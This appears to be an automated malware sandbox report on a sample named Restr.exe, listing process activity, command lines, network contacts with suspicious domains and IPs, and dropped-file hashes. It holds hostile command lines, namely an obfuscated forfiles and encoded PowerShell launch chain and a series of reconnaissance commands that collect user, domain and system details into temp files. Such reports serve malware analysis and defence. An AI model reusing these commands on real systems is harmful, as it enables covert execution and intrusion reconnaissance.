PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1444 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1444 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 3268 wrote to memory of 1184 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 3268 wrote to memory of 1184 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1184 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1184 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 3896 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 3896 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 2864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 2864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 212 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3884 wrote to memory of 212 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 212 wrote to memory of 204 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 212 wrote to memory of 204 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3884 wrote to memory of 3596 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3884 wrote to memory of 3596 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3596 wrote to memory of 1380 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3596 wrote to memory of 1380 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3884 wrote to memory of 656 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4376 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 5016 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5016 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3344 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3344 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3084 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3084 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4912 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4912 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1808 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1808 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2968 wrote to memory of 4132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\whoami.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82954 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82960 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82964 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82968 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82972 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82976 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82980 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82984 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp" "c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC215.tmp" "c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4376 -ip 4376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 964

C:\Windows\system32\cmd.exe

cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5B1B.bin0

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5B1B.bin0 > C:\Users\Admin\AppData\Local\Temp\5B1B.bin & del C:\Users\Admin\AppData\Local\Temp\5B1B.bin0"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\whoami.exe

whoami /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8482.bin0 > C:\Users\Admin\AppData\Local\Temp\8482.bin & del C:\Users\Admin\AppData\Local\Temp\8482.bin0"

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\268A.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\syswow64\svchost.exe

C:\Windows\syswow64\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 67.26.111.254:80 tcp
NL 67.26.111.254:80 tcp
NL 67.26.111.254:80 tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
FI 95.217.135.250:443 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
RU 93.95.100.166:80 93.95.100.166 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
US 209.141.45.189:80 209.141.45.189 tcp
RU 93.95.100.166:80 93.95.100.166 tcp
US 199.249.230.73:80 199.249.230.73 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
US 209.141.45.189:80 209.141.45.189 tcp
RU 93.95.100.166:80 93.95.100.166 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
DE 188.74.25.46:9030 188.74.25.46 tcp
SE 178.73.210.118:8080 178.73.210.118 tcp
HU 91.219.238.221:80 91.219.238.221 tcp
SE 193.189.100.203:80 193.189.100.203 tcp
EG 41.77.137.114:80 41.77.137.114 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
NL 88.221.144.192:80 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
JP 50.31.252.28:80 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 199.249.230.78:80 199.249.230.78 tcp
EG 41.77.137.114:80 41.77.137.114 tcp
NL 91.242.229.120:443 unavas.xyz tcp
FR 163.172.53.201:80 163.172.53.201 tcp
US 199.249.230.85:80 199.249.230.85 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
CH 45.90.59.63:80 45.90.59.63 tcp
DE 131.188.40.189:80 131.188.40.189 tcp
GB 51.89.149.148:18909 51.89.149.148 tcp
BE 87.67.210.135:45473 87.67.210.135 tcp
CH 141.255.161.167:80 141.255.161.167 tcp
LV 46.183.217.3:80 46.183.217.3 tcp
US 199.249.230.66:80 199.249.230.66 tcp
SE 178.132.78.148:80 178.132.78.148 tcp
DE 5.9.98.43:80 5.9.98.43 tcp
DE 212.227.206.135:9030 212.227.206.135 tcp
CZ 37.157.197.143:80 37.157.197.143 tcp
LU 107.189.12.47:80 107.189.12.47 tcp
AR 131.255.4.96:80 tcp
US 45.61.185.53:80 45.61.185.53 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
US 209.141.45.189:80 209.141.45.189 tcp
US 199.249.230.66:80 199.249.230.66 tcp
NL 185.19.151.8:80 185.19.151.8 tcp
DE 138.201.169.12:80 138.201.169.12 tcp
US 199.249.230.85:80 199.249.230.85 tcp
GB 51.89.149.148:18909 51.89.149.148 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
NL 5.255.102.5:9030 5.255.102.5 tcp
US 199.249.230.73:80 199.249.230.73 tcp
CL 37.235.52.67:80 37.235.52.67 tcp
SE 193.189.100.196:80 193.189.100.196 tcp
US 199.249.230.70:80 199.249.230.70 tcp
CH 185.32.221.201:80 185.32.221.201 tcp
US 99.149.215.67:80 99.149.215.67 tcp
US 199.249.230.86:80 199.249.230.86 tcp
US 199.249.230.142:80 199.249.230.142 tcp
UA 95.67.38.55:9030 95.67.38.55 tcp
US 199.249.230.157:80 199.249.230.157 tcp
US 199.249.230.70:80 199.249.230.70 tcp
CH 195.206.105.217:80 195.206.105.217 tcp
US 208.70.148.68:9030 208.70.148.68 tcp
TW 118.163.74.160:80 118.163.74.160 tcp
US 199.249.230.85:80 199.249.230.85 tcp
US 185.220.103.115:80 185.220.103.115 tcp
US 199.249.230.140:80 199.249.230.140 tcp
US 208.70.148.68:9030 208.70.148.68 tcp
US 199.249.230.86:80 199.249.230.86 tcp
FR 135.125.55.228:80 135.125.55.228 tcp
SG 139.162.43.196:80 139.162.43.196 tcp
US 51.81.248.194:80 51.81.248.194 tcp
SE 178.132.78.148:80 tcp
US 199.249.230.78:80 199.249.230.78 tcp
SE 193.189.100.202:80 193.189.100.202 tcp
US 185.220.103.115:80 185.220.103.115 tcp
US 199.249.230.175:80 199.249.230.175 tcp
US 205.185.117.53:8080 205.185.117.53 tcp
SE 193.189.100.203:80 193.189.100.203 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
US 199.249.230.180:80 199.249.230.180 tcp
US 199.249.230.168:80 tcp
FR 163.172.94.144:9030 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
SE 178.132.78.148:80 tcp
US 199.249.230.168:80 tcp
FR 163.172.94.144:9030 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
SE 178.132.78.148:80 tcp
FR 163.172.94.144:9030 tcp
US 199.249.230.168:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
SE 178.132.78.148:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
FR 163.172.94.144:9030 tcp
US 199.249.230.168:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
SE 178.132.78.148:80 tcp
FR 163.172.94.144:9030 tcp
US 199.249.230.168:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
SE 178.132.78.148:80 tcp
US 199.249.230.168:80 tcp
FR 163.172.94.144:9030 tcp
NL 91.242.229.120:443 unavas.xyz tcp

Files

memory/4376-130-0x00000000004AE000-0x00000000004BA000-memory.dmp

memory/4376-131-0x00000000004AE000-0x00000000004BA000-memory.dmp

memory/4376-132-0x00000000005B0000-0x00000000005BC000-memory.dmp

memory/4376-133-0x0000000001000000-0x000000000106F000-memory.dmp

memory/4376-134-0x0000000000D40000-0x0000000000D50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ves0881\imagestore.dat

MD5 363ab12b18b904149383cd18a3cebdb5
SHA1 1f1cd7407638f2f2b349aee61fe1de162ed3ea4f
SHA256 0ff90d9f35c1cc3ece0e6bfdbe3408f86551d8f94b13462eb81c008e71c732ad
SHA512 479113739f9dd4662ba5c14a0cb69b5623f5840794b7ea346e022a80f9d7f069dd0bb3e406e27273e3101019e022e9e75997c4a494ec0fc77ea04cfc436aed04

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 707b3dbca770b75e95ad28432f3382be
SHA1 fd1a606c1b3485980b3feb269c77a6ec997164ff
SHA256 92dabf8d30c3914a107c6301d9f7306bbb5585b1e9067288428a816d86df18ea
SHA512 763a26a15a4ebcd224ab58c21cc8e956184b06114b853b411e81b9fe8d438df53ae73b4af6fe073dc7c4fff040068d843836536d57567954e841ce0b196fcf79

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\K6H59MEI\favicon[2].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/3884-144-0x000001EA332D0000-0x000001EA332F2000-memory.dmp

memory/3884-145-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

memory/3884-146-0x000001EA31680000-0x000001EA31690000-memory.dmp

memory/3884-147-0x000001EA31680000-0x000001EA31690000-memory.dmp

memory/3884-148-0x000001EA31680000-0x000001EA31690000-memory.dmp

memory/3896-151-0x000002644EAD3000-0x000002644EAD5000-memory.dmp

memory/3896-150-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

memory/3896-149-0x000002644EAD0000-0x000002644EAD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/2864-154-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline

MD5 9c644120c46a4b3d6b0a4fca6b11b28d
SHA1 c29929e67d5856c0d844a174b6c185299c84876d
SHA256 52245374ba820b7241465c7952ae45ea06df99e1110a6df44f666863e4ca7bea
SHA512 fad8e69fc65b6c05ead56202036cec12b88bc32446756e2d997777dd4f5c707b8d760176524a50d4ce964271aeac17af17a360404b2c293fe1130fb08817a2ab

\??\c:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP

MD5 c25eda9b7a6c36f1e45517f5ae447370
SHA1 106227f3e6176afbcca86632ed9c6372639a5b63
SHA256 bdd9373edfc1d546f053dafc00d73c423a994ecc051b46a8b22ba345fbd6edc0
SHA512 811412f6f6bb918945c79f3f3defef9e4c1abe2efb761a0b462fb8071a6960ffcc4783f7b93a67eefc2ef6d2d0f90452fa035bc9db51f8750f435811fab0af4f

C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp

MD5 48de94df16a77e4e136e9882a689d026
SHA1 f13197b76805f60338c34f1507901b7656652c97
SHA256 7e11f9903cb6fbee08d2d6c7cc99abbd5834895c4d2443c86068ce1329d0c6b5
SHA512 8dd6a862620234e8b7605da60d7153690ea42c53ecb0ff155883599c1061bb8f47b83f0f5769e3efd355a1bb2b3d10a33c7865104ca1e7d819bc0b974ac83a15

C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.dll

MD5 2901d06232efaf1ec0d929b642ce90da
SHA1 6378b3e97b56e0a0001971108ec21780742d6a18
SHA256 c5d9ad171654a1e7ec987e42ec773a0821f72f7d531b3a04e5fd585d865f8056
SHA512 6867eb666caa89ce4dc19435b5256f0b9ee5f9346c0e3d3de0c9b94cb72fdd2d8574545e1558753871615c366d6252473142a342080bc8610397eab3faebdc23

\??\c:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline

MD5 bddf4ce8e4cdccfa7a2f9338cbd0f673
SHA1 99b7d9e67ff382eb8449ca1a138dae0160bb221f
SHA256 3349366b42d0d3583f000644dd98f3c12ba66f58a3249e7dcdf10944048dcad4
SHA512 eb6bc8c9cddf13c8dab7a03b4042581aa0496e7c012e3d3596556c94ecd096779595c88b56df82b5f67dcafd10282ee9a6a9d61d7ff3fae59f1ea7cca0a2bd0c

\??\c:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP

MD5 5f9b2e2a76dc742f124237ed870c7eff
